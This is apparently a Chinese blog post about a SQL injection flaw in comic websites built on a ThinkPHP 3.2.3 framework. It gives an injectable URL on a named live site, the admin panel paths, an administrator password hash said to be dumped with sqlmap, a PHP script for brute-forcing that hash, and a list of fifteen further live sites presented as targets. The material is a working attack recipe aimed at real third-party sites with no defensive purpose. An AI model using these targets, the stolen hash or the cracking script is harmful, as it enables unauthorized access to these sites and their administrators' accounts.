tp3.2.3的框架 通杀漏洞
http://www.xxmh520.com/home/book/index/id/13559*
漫画目录id过滤不严谨造成的注入 后台 admin或者admin.php
但是上个文章说到 用的是password_hash来加密的
验证的话呢 就是password_verify
如果有头铁的大哥想试试猜组合密码的话 附上以下php脚本

<?php 
function randomkeys($length) {
    $returnStr='';
    $pattern = '1234567890';   //随机数可以自己添加
    for($i = 0; $i < $length; $i ++) {
        $returnStr .= $pattern {mt_rand ( 0, 10 )}; //生成php随机数
    }
    return $returnStr;
}
for ($i=0; $i < 200; $i++) {  //循环几次
    $hash = '$2y$10$wdFK9JBse5HoOGbihwR.q.YXcmC44i3owBckvMhV06gmLvG5UlRHO';  //这个值呢 是SQL注入之后sqlmap里面获取管理员的密码值出来的  aa654339
    $login = "aa65433".randomkeys(1); //输出几位
    if (password_verify($login,$hash)) {
        echo $login."成功";
        exit();
    }else{
        echo $login.randomkeys(1)."n";
    }

}


 ?>

如果遇到乱码 请在cmd执行 chcp 65001
下面送一波采集的站

http://www.gomh555.com/
http://www.wap.hgmh12.com/
http://hgdm5.com/
http://papamhw.com/
http://xxmh.me/
http://manhua.ww01.net/
http://yymh228.com/
http://www.wwhanman.com/
http://17z.me/
http://99ymh.com/
http://k03.me/
https://www.ihgmh.com/
http://www.wy555.cn/
http://yy.ue321.cn/
http://www.xxmh520.com/

本文由 admin 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论